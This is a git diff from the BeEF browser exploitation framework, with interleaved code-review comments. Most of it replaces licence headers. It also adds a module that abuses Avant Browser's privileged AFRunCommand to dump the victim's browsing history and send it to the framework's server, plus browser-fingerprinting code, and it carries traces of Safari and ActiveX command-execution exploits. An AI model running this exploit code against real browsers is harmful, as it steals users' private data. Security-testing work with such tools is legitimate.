b/extensions/xssrays/controllers/xssrays.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/extension.rb b/extensions/xssrays/extension.rb index 4c024aed9..1f2f75e40 100644 --- a/extensions/xssrays/extension.rb +++ b/extensions/xssrays/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/handler.rb b/extensions/xssrays/handler.rb index 500e7965e..abc6eaea4 100644 --- a/extensions/xssrays/handler.rb 
+++ b/extensions/xssrays/handler.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/models/xssraysdetail.rb b/extensions/xssrays/models/xssraysdetail.rb index 8201e7b91..09993368b 100644 --- a/extensions/xssrays/models/xssraysdetail.rb +++ b/extensions/xssrays/models/xssraysdetail.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core 
diff --git a/extensions/xssrays/models/xssraysscan.rb b/extensions/xssrays/models/xssraysscan.rb index 544cb251b..e055d1f29 100644 --- a/extensions/xssrays/models/xssraysscan.rb +++ b/extensions/xssrays/models/xssraysscan.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/install b/install index 62bf0534e..a8e0cbe17 100755 --- a/install +++ b/install 
@@ -1,19 +1,9 @@ #!/usr/bin/env ruby # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # puts "\nWelcome to the BeEF installer!" diff --git a/install-beef b/install-beef index 5428316c6..ca5b7853a 100644 --- a/install-beef +++ b/install-beef @@ -1,18 +1,8 @@ #!/bin/bash # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # clear diff --git a/modules/browser/avant_steal_history/command.js b/modules/browser/avant_steal_history/command.js new file mode 100644 index 000000000..6eb89b905 --- /dev/null 
+++ b/modules/browser/avant_steal_history/command.js @@ -0,0 +1,51 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + + + var avant_iframe = document.createElement("iframe"); + //var avant_iframe = beef.dom.createInvisibleIframe(); + avant_iframe.setAttribute('src', "browser:home"); + avant_iframe.setAttribute('name','test2'); + avant_iframe.setAttribute('width','0'); + avant_iframe.setAttribute('heigth','0'); + avant_iframe.setAttribute('scrolling','no'); + + document.body.appendChild(avant_iframe); + + var vstr = {value: ""}; + + if(window['test2'].navigator) { + //This works if FF is the rendering engine + window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr); + beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value); + + } + else { + // this works if Chrome is the rendering engine + //window['test2'].AFRunCommand(60003, vstr); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox"); + + } + + + + + + +}); + diff --git a/modules/exploits/safari_launch_app/config.yaml b/modules/browser/avant_steal_history/config.yaml old mode 100755 new mode 100644 similarity index 62% rename from modules/exploits/safari_launch_app/config.yaml rename to modules/browser/avant_steal_history/config.yaml index ba9de7df2..ab161494f --- a/modules/exploits/safari_launch_app/config.yaml 
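Review bot: This new file is added with the full Apache 2.0 header, while the rest of the commit replaces that header with the three-line `Copyright (c) 2006-2012 Wade Alcorn` / `See the file 'doc/COPYING' for copying permission` notice. If the relicensing is meant to cover the whole tree, the header here should be the short form as well. The context lines of the renamed `avant_steal_history/config.yaml` and `module.rb` suggest that they also keep the old text, so all three files would need the same change.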
+++ b/modules/browser/avant_steal_history/config.yaml @@ -15,12 +15,11 @@ # beef: module: - safari_launch_app: + avant_steal_history: enable: true - category: "Exploits" - name: "Safari Launch App" - description: "Launch an application from the victim machine.

See CVE-2011-3230 for more details.

Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel." - authors: ["antisnatchor"] + category: "Browser" + name: "Get Visited URLs (Avant Browser)" + description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history." + authors: ["Roberto Suggi Liverani"] target: - user_notify: ["S"] - not_working: ["All"] + working: ["ALL"] diff --git a/modules/exploits/activex_command_execution/module.rb b/modules/browser/avant_steal_history/module.rb old mode 100755 new mode 100644 similarity index 75% rename from modules/exploits/activex_command_execution/module.rb rename to modules/browser/avant_steal_history/module.rb index c8dd70d8c..7a819fa5e --- a/modules/exploits/activex_command_execution/module.rb +++ b/modules/browser/avant_steal_history/module.rb @@ -13,12 +13,17 @@ # See the License for the specific language governing permissions and # limitations under the License. # -class Activex_command_execution < BeEF::Core::Command +class Avant_steal_history < BeEF::Core::Command def self.options + + configuration = BeEF::Core::Configuration.instance + + return [ - {'name' => 'cmd', 'ui_label'=>'Command', 'type' => 'textarea', 'value' =>'cmd.exe /c "echo Hello from BeEF! & pause"', 'width' => '400px', 'height' => '50px'} + {'name' => 'cId', 'ui_label' => 'Command ID:', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' } ] + end def post_execute diff --git a/modules/browser/browser_fingerprinting/command.js b/modules/browser/browser_fingerprinting/command.js index 3f9012df6..5e21d4775 100644 --- a/modules/browser/browser_fingerprinting/command.js +++ b/modules/browser/browser_fingerprinting/command.js 
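Review bot: In `self.options` the new local `configuration = BeEF::Core::Configuration.instance` is never read, so it can be dropped. The `cId` option is a free-form `textarea`, yet `command.js` places its value into the script as a bare number in `AFRunCommand(<%= @cId %>, vstr)`. A comment next to the option stating that it must be an integer, for example `# cId is emitted unquoted into command.js and must be numeric`, would document that expectation. The class body continues outside the hunk.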
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var browser_type = new Array; diff --git a/modules/browser/browser_fingerprinting/config.yaml b/modules/browser/browser_fingerprinting/config.yaml index 0e9c2ea94..e5a8b5437 100644 --- a/modules/browser/browser_fingerprinting/config.yaml +++ b/modules/browser/browser_fingerprinting/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/browser/browser_fingerprinting/module.rb b/modules/browser/browser_fingerprinting/module.rb index ad2157d29..d15b057f5 100644 --- a/modules/browser/browser_fingerprinting/module.rb +++ b/modules/browser/browser_fingerprinting/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # Uses methods described here: # http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/ diff --git a/modules/browser/detect_default_browser/command.js b/modules/browser/detect_default_browser/command.js new file mode 100644 index 000000000..8f004e4f0 --- /dev/null +++ b/modules/browser/detect_default_browser/command.js 
@@ -0,0 +1,28 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// Written by unsticky +// Ported to BeEF by bcoles +// For more information see http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/ + +beef.execute(function() { + + var mt = document.mimeType; + + if (mt) { + if (mt == "Safari Document") result = "Safari"; + if (mt == "Firefox HTML Document") result = "Firefox"; + if (mt == "Chrome HTML Document") result = "Chrome"; + if (mt == "HTML Document") result = "Internet Explorer"; + if (mt == "Opera Web Document") result = "Opera"; + } else { + result = "Unknown"; + } + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "browser="+result); + +}); + diff --git a/modules/browser/detect_default_browser/config.yaml b/modules/browser/detect_default_browser/config.yaml new file mode 100644 index 000000000..6561949fc --- /dev/null +++ b/modules/browser/detect_default_browser/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + detect_default_browser: + enable: true + category: "Browser" + name: "Detect Default Browser" + description: "This module detects which browser is configured as the default web browser." + authors: ["unsticky", "bcoles"] + target: + working: ["IE"] + not_working: ["All"] diff --git a/modules/browser/detect_default_browser/module.rb b/modules/browser/detect_default_browser/module.rb new file mode 100644 index 000000000..5fd5764d4 --- /dev/null +++ b/modules/browser/detect_default_browser/module.rb 
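Review bot: `result` is assigned without ever being declared, and when `document.mimeType` is set but matches none of the five strings it is never assigned at all, so `"browser="+result` throws a ReferenceError or picks up a leftover global from an earlier run. Declaring `var result = "Unknown";` before the `if (mt)` block and dropping the `else` branch covers both cases. A short comment that `document.mimeType` appears to be specific to Internet Explorer would also explain why `config.yaml` lists only IE as working.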
@@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Detect_default_browser < BeEF::Core::Command + + def post_execute + content = {} + content['browser'] = @datastore['browser'] if not @datastore['browser'].nil? + save content + end + +end diff --git a/modules/browser/detect_firebug/command.js b/modules/browser/detect_firebug/command.js index 6887c3554..bf656bc2d 100644 --- a/modules/browser/detect_firebug/command.js +++ b/modules/browser/detect_firebug/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var result = "Not in use or not installed"; if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled and in use!"; diff --git a/modules/browser/detect_firebug/config.yaml b/modules/browser/detect_firebug/config.yaml index 50f54194b..10e011191 100644 --- a/modules/browser/detect_firebug/config.yaml +++ b/modules/browser/detect_firebug/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/detect_firebug/module.rb b/modules/browser/detect_firebug/module.rb index 326d375d2..4a1515fc9 100644 --- a/modules/browser/detect_firebug/module.rb +++ b/modules/browser/detect_firebug/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_firebug < BeEF::Core::Command 
diff --git a/modules/browser/detect_popup_blocker/command.js b/modules/browser/detect_popup_blocker/command.js index 29b785aba..cf64e2e21 100644 --- a/modules/browser/detect_popup_blocker/command.js +++ b/modules/browser/detect_popup_blocker/command.js @@ -1,20 +1,11 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { - beef.net.send("<%= @command_url %>", <%= @command_id %>, "popup_blocker_enabled="+beef.browser.popup.blocker_enbabled()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "popup_blocker_enabled="+beef.browser.popup.blocker_enabled()); }); diff --git a/modules/browser/detect_popup_blocker/config.yaml b/modules/browser/detect_popup_blocker/config.yaml index 2a1789fac..c5cee313a 100644 --- a/modules/browser/detect_popup_blocker/config.yaml +++ b/modules/browser/detect_popup_blocker/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/detect_popup_blocker/module.rb b/modules/browser/detect_popup_blocker/module.rb index 85f4bc718..285d69ebe 100644 --- a/modules/browser/detect_popup_blocker/module.rb +++ b/modules/browser/detect_popup_blocker/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_popup_blocker < BeEF::Core::Command 
diff --git a/modules/browser/detect_unsafe_activex/command.js b/modules/browser/detect_unsafe_activex/command.js index b83317dec..cae5083bf 100644 --- a/modules/browser/detect_unsafe_activex/command.js +++ b/modules/browser/detect_unsafe_activex/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var unsafe = true; diff --git a/modules/browser/detect_unsafe_activex/config.yaml b/modules/browser/detect_unsafe_activex/config.yaml index 6cb65983d..a64fe7fcf 100644 --- a/modules/browser/detect_unsafe_activex/config.yaml +++ b/modules/browser/detect_unsafe_activex/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/detect_unsafe_activex/module.rb b/modules/browser/detect_unsafe_activex/module.rb index 9f7947d56..5504ceec2 100644 --- a/modules/browser/detect_unsafe_activex/module.rb +++ b/modules/browser/detect_unsafe_activex/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_unsafe_activex < BeEF::Core::Command 
diff --git a/modules/browser/get_visited_domains/command.js b/modules/browser/get_visited_domains/command.js index d2c04fac1..7e55b8b8c 100644 --- a/modules/browser/get_visited_domains/command.js +++ b/modules/browser/get_visited_domains/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + var hidden_iframe = beef.dom.createInvisibleIframe(); hidden_iframe.setAttribute('id','f'); hidden_iframe.setAttribute('name','f'); diff --git a/modules/browser/get_visited_domains/config.yaml b/modules/browser/get_visited_domains/config.yaml index ee2921948..b552f4e10 100644 --- a/modules/browser/get_visited_domains/config.yaml +++ b/modules/browser/get_visited_domains/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/get_visited_domains/module.rb b/modules/browser/get_visited_domains/module.rb index 8effcac55..206e41243 100644 --- a/modules/browser/get_visited_domains/module.rb +++ b/modules/browser/get_visited_domains/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_visited_domains < BeEF::Core::Command 
diff --git a/modules/browser/get_visited_urls/command.js b/modules/browser/get_visited_urls/command.js index acffd1b22..a31bfe665 100644 --- a/modules/browser/get_visited_urls/command.js +++ b/modules/browser/get_visited_urls/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var results = beef.browser.hasVisited("<%== format_multiline(@urls) %>"); var comp = ''; diff --git a/modules/browser/get_visited_urls/config.yaml b/modules/browser/get_visited_urls/config.yaml index 02f2cc7b2..81363c1ae 100644 --- a/modules/browser/get_visited_urls/config.yaml +++ b/modules/browser/get_visited_urls/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/get_visited_urls/module.rb b/modules/browser/get_visited_urls/module.rb index 5cd8626a5..4454023e6 100644 --- a/modules/browser/get_visited_urls/module.rb +++ b/modules/browser/get_visited_urls/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_visited_urls < BeEF::Core::Command 
diff --git a/modules/browser/hooked_domain/ajax_fingerprint/command.js b/modules/browser/hooked_domain/ajax_fingerprint/command.js index ccb2bf83c..5fb2bf6c3 100644 --- a/modules/browser/hooked_domain/ajax_fingerprint/command.js +++ b/modules/browser/hooked_domain/ajax_fingerprint/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { 